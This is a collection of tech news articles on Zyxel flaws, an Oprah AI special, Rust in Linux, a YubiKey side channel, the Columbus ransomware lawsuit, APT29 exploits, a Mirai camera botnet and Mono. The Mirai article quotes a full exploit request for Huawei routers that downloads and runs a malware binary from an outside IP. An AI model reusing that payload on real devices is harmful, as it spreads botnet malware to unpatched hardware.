Biz & IT

zyxel-warns-of-vulnerabilities-in-a-wide-range-of-its-products

Zyxel warns of vulnerabilities in a wide range of its products

GET YER PATCHING ON —

Most serious vulnerabilities carry severity ratings of 9.8 and 8.1 out of a possible 10.

Zyxel warns of vulnerabilities in a wide range of its products

Getty Images

Networking hardware-maker Zyxel is warning of nearly a dozen vulnerabilities in a wide array of its products. If left unpatched, some of them could enable the complete takeover of the devices, which can be targeted as an initial point of entry into large networks.

The most serious vulnerability, tracked as CVE-2024-7261, can be exploited to “allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device,” Zyxel warned. The flaw, with a severity rating of 9.8 out of 10, stems from the “improper neutralization of special elements in the parameter ‘host’ in the CGI program” of vulnerable access points and security routers. Nearly 30 Zyxel devices are affected. As is the case with the remaining vulnerabilities in this post, Zyxel is urging customers to patch them as soon as possible.

But wait… there’s more

The hardware manufacturer warned of seven additional vulnerabilities affecting firewall series including the ATP, USG-FLEX, and USG FLEX 50(W)/USG20(W)-VPN. The vulnerabilities carry severity ratings ranging from 4.9 to 8.1. The vulnerabilities are:

CVE-2024-6343: a buffer overflow vulnerability in the CGI program that could allow an authenticated attacker with administrator privileges to wage denial-of-service by sending crafted HTTP requests.

CVE-2024-7203: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to run OS commands by executing a crafted CLI command.

CVE-2024-42057: A command injection vulnerability in the IPSec VPN feature that could allow an unauthenticated attacker to run OS commands by sending a crafted username. The attack would be successful only if the device was configured in User-Based-PSK authentication mode and a valid user with a long username exceeding 28 characters exists.

CVE-2024-42058: A null pointer dereference vulnerability in some firewall versions that could allow an unauthenticated attacker to wage DoS attacks by sending crafted packets.

CVE-2024-42059: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to run OS commands on an affected device by uploading a crafted compressed language file via FTP.

CVE-2024-42060: A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to execute OS commands by uploading a crafted internal user agreement file to the vulnerable device.

CVE-2024-42061: A reflected cross-site scripting vulnerability in the CGI program “dynamic_script.cgi” that could allow an attacker to trick a user into visiting a crafted URL with the XSS payload. The attacker could obtain browser-based information if the malicious script is executed on the victim’s browser.

The remaining vulnerability is CVE-2024-5412 with a severity rating of 7.5. It resides in 50 Zyxel product models, including a range of customer premises equipment, fiber optical network terminals, and security routers. A buffer overflow vulnerability in the “libclinkc” library of affected devices could allow an unauthenticated attacker to wage denial-of-service attacks by sending a crafted HTTP request.

In recent years, vulnerabilities in Zyxel devices have regularly come under active attack. Many of the patches are available for download at links listed in the advisories. In a small number of cases, the patches are available through the cloud. Patches for some products are available only by privately contacting the company’s support team.

Zyxel warns of vulnerabilities in a wide range of its products Read More »

oprah’s-upcoming-ai-television-special-sparks-outrage-among-tech-critics

Oprah’s upcoming AI television special sparks outrage among tech critics

You get an AI, and You get an AI —

AI opponents say Gates, Altman, and others will guide Oprah through an AI “sales pitch.”

An ABC handout promotional image for

Enlarge / An ABC handout promotional image for “AI and the Future of Us: An Oprah Winfrey Special.”

On Thursday, ABC announced an upcoming TV special titled, “AI and the Future of Us: An Oprah Winfrey Special.” The one-hour show, set to air on September 12, aims to explore AI’s impact on daily life and will feature interviews with figures in the tech industry, like OpenAI CEO Sam Altman and Bill Gates. Soon after the announcement, some AI critics began questioning the guest list and the framing of the show in general.

Sure is nice of Oprah to host this extended sales pitch for the generative AI industry at a moment when its fortunes are flagging and the AI bubble is threatening to burst,” tweeted author Brian Merchant, who frequently criticizes generative AI technology in op-eds, social media, and through his “Blood in the Machine” AI newsletter.

“The way the experts who are not experts are presented as such 💀 what a train wreck,” replied artist Karla Ortiz, who is a plaintiff in a lawsuit against several AI companies. “There’s still PLENTY of time to get actual experts and have a better discussion on this because yikes.”

The trailer for Oprah’s upcoming TV special on AI.

On Friday, Ortiz created a lengthy viral thread on X that detailed her potential issues with the program, writing, “This event will be the first time many people will get info on Generative AI. However it is shaping up to be a misinformed marketing event starring vested interests (some who are under a litany of lawsuits) who ignore the harms GenAi inflicts on communities NOW.”

Critics of generative AI like Ortiz question the utility of the technology, its perceived environmental impact, and what they see as blatant copyright infringement. In training AI language models, tech companies like Meta, Anthropic, and OpenAI commonly use copyrighted material gathered without license or owner permission. OpenAI claims that the practice is “fair use.”

Oprah’s guests

According to ABC, the upcoming special will feature “some of the most important and powerful people in AI,” which appears to roughly translate to “famous and publicly visible people related to tech.” Microsoft co-founder Bill Gates, who stepped down as Microsoft CEO 24 years ago, will appear on the show to explore the “AI revolution coming in science, health, and education,” ABC says, and warn of “the once-in-a-century type of impact AI may have on the job market.”

As a guest representing ChatGPT-maker OpenAI, Sam Altman will explain “how AI works in layman’s terms” and discuss “the immense personal responsibility that must be borne by the executives of AI companies.” Karla Ortiz specifically criticized Altman in her thread by saying, “There are far more qualified individuals to speak on what GenAi models are than CEOs. Especially one CEO who recently said AI models will ‘solve all physics.’ That’s an absurd statement and not worthy of your audience.”

In a nod to present-day content creation, YouTube creator Marques Brownlee will appear on the show and reportedly walk Winfrey through “mind-blowing demonstrations of AI’s capabilities.”

Brownlee’s involvement received special attention from some critics online. “Marques Brownlee should be absolutely ashamed of himself,” tweeted PR consultant and frequent AI critic Ed Zitron, who frequently heaps scorn on generative AI in his own newsletter. “What a disgraceful thing to be associated with.”

Other guests include Tristan Harris and Aza Raskin from the Center for Humane Technology, who aim to highlight “emerging risks posed by powerful and superintelligent AI,” an existential risk topic that has its own critics. And FBI Director Christopher Wray will reveal “the terrifying ways criminals and foreign adversaries are using AI,” while author Marilynne Robinson will reflect on “AI’s threat to human values.”

Going only by the publicized guest list, it appears that Oprah does not plan to give voice to prominent non-doomer critics of AI. “This is really disappointing @Oprah and frankly a bit irresponsible to have a one-sided conversation on AI without informed counterarguments from those impacted,” tweeted TV producer Theo Priestley.

Others on the social media network shared similar criticism about a perceived lack of balance in the guest list, including Dr. Margaret Mitchell of Hugging Face. “It could be beneficial to have an AI Oprah follow-up discussion that responds to what happens in [the show] and unpacks generative AI in a more grounded way,” she said.

Oprah’s AI special will air on September 12 on ABC (and a day later on Hulu) in the US, and it will likely elicit further responses from the critics mentioned above. But perhaps that’s exactly how Oprah wants it: “It may fascinate you or scare you,” Winfrey said in a promotional video for the special. “Or, if you’re like me, it may do both. So let’s take a breath and find out more about it.”

Oprah’s upcoming AI television special sparks outrage among tech critics Read More »

rust-in-linux-lead-retires-rather-than-deal-with-more-“nontechnical-nonsense”

Rust in Linux lead retires rather than deal with more “nontechnical nonsense”

Oxidation consternation —

How long can the C languages maintain their primacy in the kernel?

Rusty links of a chain, against an also-rusted metal background.

Enlarge / Rust never sleeps. But Rust, the programming language, can be held at bay if enough kernel programmers aren’t interested in seeing it implemented.

Getty Images

The Linux kernel is not a place to work if you’re not ready for some, shall we say, spirited argument. Still, one key developer in the project to expand Rust’s place inside the largely C-based kernel feels the “nontechnical nonsense” is too much, so he’s retiring.

Wedson Almeida Filho, a leader in the Rust for Linux project, wrote to the Linux kernel mailing list last week to remove himself as the project’s maintainer. “After almost 4 years, I find myself lacking the energy and enthusiasm I once had to respond to some of the nontechnical nonsense, so it’s best to leave it up to those who still have it in them,” Filho wrote. While thanking his teammates, he noted that he believed the future of kernels “is with memory-safe languages,” such as Rust. “I am no visionary but if Linux doesn’t internalize this, I’m afraid some other kernel will do to it what it did to Unix,” Filho wrote.

Filho also left a “sample for context,” a link to a moment during a Linux conference talk in which an off-camera voice, identified by Filho in a Register interview as kernel maintainer Ted Ts’o, emphatically interjects: “Here’s the thing: you’re not going to force all of us to learn Rust.” In the context of Filho’s request that Linux’s file system implement Rust bindings, Ts’o says that while he knows he must fix all the C code for any change he makes, he cannot or will not fix the Rust bindings that may be affected.

“They just want to keep their C code”

Asahi Lina, developer on the Asahi Linux project, posted on Mastodon late last week: “I regretfully completely understand Wedson’s frustrations.” Noting that “a subset of C kernel developers just seem determined to make the lives of Rust maintainers as difficult as possible,” Lina detailed the memory safety issues they ran into writing Direct Rendering Manager (DRM) scheduler abstractions. Lina tried to push small fixes that would make the C code “more robust and the lifetime requirements sensible,” but was blocked by the maintainer. Bugs in that DRM scheduler’s C code are the only causes of kernel panics in Lina’s Apple GPU driver, she wrote—”Because I wrote it in Rust.”

“But I get the feeling that some Linux kernel maintainers just don’t care about future code quality, or about stability or security any more,” Lina wrote. “They just want to keep their C code and wish us Rust folks would go away. And that’s really sad… and isn’t helping make Linux better.”

Drew DeVault, founder of SourceHut, blogged about Rust’s attempts to find a place inside the Kernel. In theory the kernel should welcome enthusiastic input from motivated newcomers. “In practice, the Linux community is the wild wild west, and sweeping changes are infamously difficult to achieve consensus on, and this is by far the broadest sweeping change ever proposed for the project,” DeVault writes. “Every subsystem is a private fiefdom, subject to the whims of each one of Linux’s 1,700+ maintainers, almost all of whom have a dog in this race. It’s herding cats: introducing Rust effectively is one part coding work and ninety-nine parts political work – and it’s a lot of coding work.”

Rather than test their patience with the kernel’s politics, DeVault suggests Rust developers build a Linux-compatible kernel from scratch. “Freeing yourselves of the [Linux Kernel Mailing List] political battles would probably be a big win for the ambitions of bringing Rust into kernel space,” DeVault writes.

Torvalds understands why Rust uptake is slow

You might be wondering what lead maintainer Linus Torvalds thinks about all this. He took a “wait and see” approach in 2021, hoping Rust would first make itself known in relatively isolated device drivers. At an appearance late last month, Torvalds… essentially agreed with the Rust-minded developer complaints, albeit from a much greater remove.

“I was expecting [Rust] updates to be faster, but part of the problem is that old-time kernel developers are used to C and don’t know Rust,” Torvalds said. “They’re not exactly excited about having to learn a new language that is, in some respects, very different. So there’s been some pushback on Rust.” Torvalds added, however, that “another reason has been the Rust infrastructure itself has not been super stable.”

The Linux kernel is a high-stakes project in which hundreds or thousands of developers have a stake; conflict is perhaps inevitable. Time will tell how long C will remain the primary way of coding for, and thinking about, such a large yet always-moving, codebase.

Ars has reached out to both Filho and Ts’o for comment and will update this post with response.

Rust in Linux lead retires rather than deal with more “nontechnical nonsense” Read More »

yubikeys-are-vulnerable-to-cloning-attacks-thanks-to-newly-discovered-side-channel

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

ATTACK OF THE CLONES —

Sophisticated attack breaks security assurances of the most popular FIDO key.

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

Yubico

The YubiKey 5, the most widely used hardware token for two-factor authentication based on the FIDO standard, contains a cryptographic flaw that makes the finger-size device vulnerable to cloning when an attacker gains brief physical access to it, researchers said Tuesday.

The cryptographic flaw, known as a side channel, resides in a small microcontroller used in a large number of other authentication devices, including smartcards used in banking, electronic passports, and the accessing of secure areas. While the researchers have confirmed all YubiKey 5 series models can be cloned, they haven’t tested other devices using the microcontroller, such as the SLE78 made by Infineon and successor microcontrollers known as the Infineon Optiga Trust M and the Infineon Optiga TPM. The researchers suspect that any device using any of these three microcontrollers and the Infineon cryptographic library contains the same vulnerability.

Patching not possible

YubiKey-maker Yubico issued an advisory in coordination with a detailed disclosure report from NinjaLab, the security firm that reverse-engineered the YubiKey 5 series and devised the cloning attack. All YubiKeys running firmware prior to version 5.7—which was released in May and replaces the Infineon cryptolibrary with a custom one—are vulnerable. Updating key firmware on the YubiKey isn’t possible. That leaves all affected YubiKeys permanently vulnerable.

“An attacker could exploit this issue as part of a sophisticated and targeted attack to recover affected private keys,” the advisory confirmed. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM, knowledge of the accounts they want to target and specialized equipment to perform the necessary attack. Depending on the use case, the attacker may also require additional knowledge including username, PIN, account password, or authentication key.”

Side channels are the result of clues left in physical manifestations such as electromagnetic emanations, data caches, or the time required to complete a task that leaks cryptographic secrets. In this case, the side channel is the amount of time taken during a mathematical calculation known as a modular inversion. The Infineon cryptolibrary failed to implement a common side-channel defense known as constant time as it performs modular inversion operations involving the Elliptic Curve Digital Signature Algorithm. Constant time ensures the time sensitive cryptographic operations execute is uniform rather than variable depending on the specific keys.

More precisely, the side channel is located in the Infineon implementation of the Extended Euclidean Algorithm, a method for, among other things, computing the modular inverse. By using an oscilloscope to measure the electromagnetic radiation while the token is authenticating itself, the researchers can detect tiny execution time differences that reveal a token’s ephemeral ECDSA key, also known as a nonce. Further analysis allows the researchers to extract the secret ECDSA key that underpins the entire security of the token.

In Tuesday’s report, NinjaLab co-founder Thomas Roche wrote:

In the present work, NinjaLab unveils a new side-channel vulnerability in the ECDSA implementation of Infineon 9 on any security microcontroller family of the manufacturer.This vulnerability lies in the ECDSA ephemeral key (or nonce) modular inversion, and, more precisely, in the Infineon implementation of the Extended Euclidean Algorithm (EEA for short). To our knowledge, this is the first time an implementation of the EEA is shown to be vulnerable to side-channel analysis (contrarily to the EEA binary version). The exploitation of this vulnerability is demonstrated through realistic experiments and we show that an adversary only needs to have access to the device for a few minutes. The offline phase took us about 24 hours; with more engineering work in the attack development, it would take less than one hour.

After a long phase of understanding Infineon implementation through side-channel analysis on a Feitian 10 open JavaCard smartcard, the attack is tested on a YubiKey 5Ci, a FIDO hardware token from Yubico. All YubiKey 5 Series (before the firmware update 5.7 11 of May 6th, 2024) are affected by the attack. In fact all products relying on the ECDSA of Infineon cryptographic library running on an Infineon security microcontroller are affected by the attack. We estimate that the vulnerability exists for more than 14 years in Infineon top secure chips. These chips and the vulnerable part of the cryptographic library went through about 80 CC certification evaluations of level AVA VAN 4 (for TPMs) or AVA VAN 5 (for the others) from 2010 to 2024 (and a bit less than 30 certificate maintenances).

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel Read More »

city-of-columbus-sues-man-after-he-discloses-severity-of-ransomware-attack

City of Columbus sues man after he discloses severity of ransomware attack

WHISTLEBLOWER IN LEGAL CROSSHAIRS —

Mayor said data was unusable to criminals; researcher proved otherwise.

A ransom note is plastered across a laptop monitor.

A judge in Ohio has issued a temporary restraining order against a security researcher who presented evidence that a recent ransomware attack on the city of Columbus scooped up reams of sensitive personal information, contradicting claims made by city officials.

The order, issued by a judge in Ohio’s Franklin County, came after the city of Columbus fell victim to a ransomware attack on July 18 that siphoned 6.5 terabytes of the city’s data. A ransomware group known as Rhysida took credit for the attack and offered to auction off the data with a starting bid of about $1.7 million in bitcoin. On August 8, after the auction failed to find a bidder, Rhysida released what it said was about 45 percent of the stolen data on the group’s dark web site, which is accessible to anyone with a TOR browser.

Dark web not readily available to public—really?

Columbus Mayor Andrew Ginther said on August 13 that a “breakthrough” in the city’s forensic investigation of the breach found that the sensitive files Rhysida obtained were either encrypted or corrupted, making them “unusable” to the thieves. Ginther went on to say the data’s lack of integrity was likely the reason the ransomware group had been unable to auction off the data.

Shortly after Ginther made his remarks, security researcher David Leroy Ross contacted local news outlets and presented evidence that showed the data Rhysida published was fully intact and contained highly sensitive information regarding city employees and residents. Ross, who uses the alias Connor Goodwolf, presented screenshots and other data that showed the files Rhysida had posted included names from domestic violence cases and Social Security numbers for police officers and crime victims. Some of the data spanned years.

On Thursday, the city of Columbus sued Ross for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion. The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him “interacting” with them and required special expertise and tools. The suit went on to challenge Ross alerting reporters to the information, which ii claimed would not be easily obtained by others.

“Only individuals willing to navigate and interact with the criminal element on the dark web, who also have the computer expertise and tools necessary to download data from the dark web, would be able to do so,” city attorneys wrote. “The dark web-posted data is not readily available for public consumption. Defendant is making it so.”

The same day, a Franklin County judge granted the city’s motion for a temporary restraining order against Ross. It bars the researcher “from accessing, and/or downloading, and/or disseminating” any city files that were posted to the dark web. The motion was made and granted “ex parte,” meaning in secret before Ross was informed of it or had an opportunity to present his case.

In a press conference Thursday, Columbus City Attorney Zach Klein defended his decision to sue Ross and obtain the restraining order.

“This is not about freedom of speech or whistleblowing,” he said. “This is about the downloading and disclosure of stolen criminal investigatory records. This effect is to get [Ross] to stop downloading and disclosing stolen criminal records to protect public safety.”

The Columbus city attorney’s office didn’t respond to questions sent by email. It did provide the following statement:

The lawsuit filed by the City of Columbus pertains to stolen data that Mr. Ross downloaded from the dark web to his own, local device and disseminated to the media. In fact, several outlets used the stolen data provided by Ross to go door-to-door and contact individuals using names and addresses contained within the stolen data. As has now been extensively reported, Mr. Ross also showed multiple news outlets stolen, confidential data belonging to the City which he claims reveal the identities of undercover police officers and crime victims as well as evidence from active criminal investigations. Sharing this stolen data threatens public safety and the integrity of the investigations. The temporary restraining order granted by the Court prohibits Mr. Ross from disseminating any of the City’s stolen data. Mr. Ross is still free to speak about the cyber incident and even describe what kind of data is on the dark web—he just cannot disseminate that data.

Attempts to reach Ross for comment were unsuccessful. Email sent to the Columbus mayor’s office went unanswered.

A screenshot showing the Rhysida dark web site.

Enlarge / A screenshot showing the Rhysida dark web site.

As shown above in the screenshot of the Rhysida dark web site on Friday morning, the sensitive data remains available to anyone who looks for it. Friday’s order may bar Ross from accessing the data or disseminating it to reporters, but it has no effect on those who plan to use the data for malicious purposes.

City of Columbus sues man after he discloses severity of ransomware attack Read More »

chatgpt-hits-200-million-active-weekly-users,-but-how-many-will-admit-using-it?

ChatGPT hits 200 million active weekly users, but how many will admit using it?

Your secret friend —

Despite corporate prohibitions on AI use, people flock to the chatbot in record numbers.

The OpenAI logo emerging from broken jail bars, on a purple background.

On Thursday, OpenAI said that ChatGPT has attracted over 200 million weekly active users, according to a report from Axios, doubling the AI assistant’s user base since November 2023. The company also revealed that 92 percent of Fortune 500 companies are now using its products, highlighting the growing adoption of generative AI tools in the corporate world.

The rapid growth in user numbers for ChatGPT (which is not a new phenomenon for OpenAI) suggests growing interest in—and perhaps reliance on— the AI-powered tool, despite frequent skepticism from some critics of the tech industry.

“Generative AI is a product with no mass-market utility—at least on the scale of truly revolutionary movements like the original cloud computing and smartphone booms,” PR consultant and vocal OpenAI critic Ed Zitron blogged in July. “And it’s one that costs an eye-watering amount to build and run.”

Despite this kind of skepticism (which raises legitimate questions about OpenAI’s long-term viability), OpenAI claims that people are using ChatGPT and OpenAI’s services in record numbers. One reason for the apparent dissonance is that ChatGPT users might not readily admit to using it due to organizational prohibitions against generative AI.

Wharton professor Ethan Mollick, who commonly explores novel applications of generative AI on social media, tweeted Thursday about this issue. “Big issue in organizations: They have put together elaborate rules for AI use focused on negative use cases,” he wrote. “As a result, employees are too scared to talk about how they use AI, or to use corporate LLMs. They just become secret cyborgs, using their own AI & not sharing knowledge”

The new prohibition era

It’s difficult to get hard numbers showing the number of companies with AI prohibitions in place, but a Cisco study released in January claimed that 27 percent of organizations in their study had banned generative AI use. Last August, ZDNet reported on a BlackBerry study that said 75 percent of businesses worldwide were “implementing or considering” plans to ban ChatGPT and other AI apps.

As an example, Ars Technica’s parent company Condé Nast maintains a no-AI policy related to creating public-facing content with generative AI tools.

Prohibitions aren’t the only issue complicating public admission of generative AI use. Social stigmas have been developing around generative AI technology that stem from job loss anxiety, potential environmental impact, privacy issues, IP and ethical issues, security concerns, fear of a repeat of cryptocurrency-like grifts, and a general wariness of Big Tech that some claim has been steadily rising over recent years.

Whether the current stigmas around generative AI use will break down over time remains to be seen, but for now, OpenAI’s management is taking a victory lap. “People are using our tools now as a part of their daily lives, making a real difference in areas like healthcare and education,” OpenAI CEO Sam Altman told Axios in a statement, “whether it’s helping with routine tasks, solving hard problems, or unlocking creativity.”

Not the only game in town

OpenAI also told Axios that usage of its AI language model APIs has doubled since the release of GPT-4o mini in July. This suggests software developers are increasingly integrating OpenAI’s large language model (LLM) tech into their apps.

And OpenAI is not alone in the field. Companies like Microsoft (with Copilot, based on OpenAI’s technology), Google (with Gemini), Meta (with Llama), and Anthropic (Claude) are all vying for market share, frequently updating their APIs and consumer-facing AI assistants to attract new users.

If the generative AI space is a market bubble primed to pop, as some have claimed, it is a very big and expensive one that is apparently still growing larger by the day.

ChatGPT hits 200 million active weekly users, but how many will admit using it? Read More »

commercial-spyware-vendor-exploits-used-by-kremlin-backed-hackers,-google-says

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

MERCHANTS OF HACKING —

Findings undercut pledges of NSO Group and Intgellexa their wares won’t be abused.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

Getty Images

Critics of spyware and exploit sellers have long warned that the advanced hacking sold by commercial surveillance vendors (CSVs) represents a worldwide danger because they inevitably find their way into the hands of malicious parties, even when the CSVs promise they will be used only to target known criminals. On Thursday, Google analysts presented evidence bolstering the critique after finding that spies working on behalf of the Kremlin used exploits that are “identical or strikingly similar” to those sold by spyware makers Intellexa and NSO Group.

The hacking outfit, tracked under names including APT29, Cozy Bear, and Midnight Blizzard, is widely assessed to work on behalf of Russia’s Foreign Intelligence Service, or the SVR. Researchers with Google’s Threat Analysis Group, which tracks nation-state hacking, said Thursday that they observed APT29 using exploits identical or closely identical to those first used by commercial exploit sellers NSO Group of Israel and Intellexa of Ireland. In both cases, the Commercial Surveillance Vendors’ exploits were first used as zero-days, meaning when the vulnerabilities weren’t publicly known and no patch was available.

Identical or strikingly similar

Once patches became available for the vulnerabilities, TAG said, APT29 used the exploits in watering hole attacks, which infect targets by surreptitiously planting exploits on sites they’re known to frequent. TAG said APT29 used the exploits as n-days, which target vulnerabilities that have recently been fixed but not yet widely installed by users.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from CSVs, Intellexa, and NSO Group,” TAG’s Clement Lecigne wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

In one case, Lecigne said, TAG observed APT29 compromising the Mongolian government sites mfa.gov[.]mn and cabinet.gov[.]mn and planting a link that loaded code exploiting CVE-2023-41993, a critical flaw in the WebKit browser engine. The Russian operatives used the vulnerability, loaded onto the sites in November, to steal browser cookies for accessing online accounts of targets they hoped to compromise. The Google analyst said that the APT29 exploit “used the exact same trigger” as an exploit Intellexa used in September 2023, before CVE-2023-41993 had been fixed.

Lucigne provided the following image showing a side-by-side comparison of the code used in each attack.

A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Enlarge / A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Google TAG

APT29 used the same exploit again in February of this year in a watering hole attack on the Mongolian government website mga.gov[.]mn.

In July 2024, APT29 planted a new cookie-stealing attack on mga.gov[.]me. It exploited CVE-2024-5274 and CVE-2024-4671, two n-day vulnerabilities in Google Chrome. Lucigne said APT29’s CVE-2024-5274 exploit was a slightly modified version of that NSO Group used in May 2024 when it was still a zero-day. The exploit for CVE-2024-4671, meanwhile, contained many similarities to CVE-2021-37973, an exploit Intellexa had previously used to evade Chrome sandbox protections.

The timeline of the attacks is illustrated below:

Google TAG

As noted earlier, it’s unclear how APT29 would have obtained the exploits. Possibilities include: malicious insiders at the CSVs or brokers who worked with the CSVs, hacks that stole the code, or outright purchases. Both companies defend their business by promising to sell exploits only to governments of countries deemed to have good world standing. The evidence unearthed by TAG suggests that despite those assurances, the exploits are finding their way into the hands of government-backed hacking groups.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” Lucigne wrote.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says Read More »

unpatchable-0-day-in-surveillance-cam-is-being-exploited-to-install-mirai

Unpatchable 0-day in surveillance cam is being exploited to install Mirai

MIRAI STRIKES AGAIN —

Vulnerability is easy to exploit and allows attackers to remotely execute commands.

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn paralyzed vast swaths of the Internet.

Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that it has observed the threat actor behind the attacks perform DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019 when exploit code became public. The zero-day resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publishing of CVE-2024-7029.

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Decoded payload

Fig. 1: Decoded payload body of the exploit attempts

Enlarge / Fig. 1: Decoded payload body of the exploit attempts

Akamai

Fig. 1: Decoded payload body of the exploit attempts

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit

Enlarge / Fig. 2: PoC of the exploit

Akamai

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader

Enlarge / Fig. 3: Strings from the JavaScript downloader

Akamai

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console

Enlarge / Fig. 4: Execution of malware showing output to console

Akamai

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1    Content-Length: 430    Connection: keep-alive    Accept: */Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="https://arstechnica.com/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"      $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)  

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.

Unpatchable 0-day in surveillance cam is being exploited to install Mirai Read More »

a-long,-weird-foss-circle-ends-as-microsoft-donates-mono-to-wine-project

A long, weird FOSS circle ends as Microsoft donates Mono to Wine project

Thank you for your service (calls) —

Mono had many homes over 23 years, but Wine’s repos might be its final stop.

Man looking over the offerings at a wine store with a tablet in hand.

Enlarge / Does Mono fit between the Chilean cab sav and Argentinian malbec, or is it more of an orange, maybe?

Getty Images

Microsoft has donated the Mono Project, an open-source framework that brought its .NET platform to non-Windows systems, to the Wine community. WineHQ will be the steward of the Mono Project upstream code, while Microsoft will encourage Mono-based apps to migrate to its open source .NET framework.

As Microsoft notes on the Mono Project homepage, the last major release of Mono was in July 2019. Mono was “a trailblazer for the .NET platform across many operating systems” and was the first implementation of .NET on Android, iOS, Linux, and other operating systems.

Ximian, Novell, SUSE, Xamarin, Microsoft—now Wine

Mono began as a project of Miguel de Icaza, co-creator of the GNOME desktop. De Icaza led Ximian (originally Helix Code), aiming to bring Microsoft’s then-new .NET platform to Unix-like platforms. Ximian was acquired by Novell in 2003.

Mono was key to de Icaza’s efforts to get Microsoft’s Silverlight, a browser plug-in for “interactive rich media applications” (i.e., a Flash competitor), onto Linux systems. Novell pushed Mono as a way to develop iOS apps with C# and other .NET languages. Microsoft applied its “Community Promise” to its .NET standards in 2009, confirming its willingness to let Mono flourish outside its specific control.

By 2011, however, Novell, on its way to being acquired into obsolescence, was not doing much with Mono, and de Icaza started Xamarin to push Mono for Android. Novell (through its SUSE subsidiary) and Xamarin reached an agreement in which Xamarin would take over the IP and customers, using Mono inside Novell/SUSE.

Microsoft open-sourced most of .NET in 2014, then took it further, acquiring Xamarin entirely in 2016, putting Mono under an MIT license, and bundling Xamarin offerings into various open source projects. Mono now exists as a repository that may someday be archived, though Microsoft promises to keep binaries around for at least four years. Those who want to keep using Mono are directed to Microsoft’s “modern fork” of the project inside .NET.

What does this mean for Mono and Wine? Not much at first. Wine, a compatibility layer for Windows apps on POSIX-compliant systems, has already made use of Mono code in fixes and has its own Mono engine. By donating Mono to Wine, Microsoft has, at a minimum, erased the last bit of concern anyone might have had about the company’s control of the project. It’s a very different, open-source-conversant Microsoft making this move, of course, but regardless, it’s a good gesture.

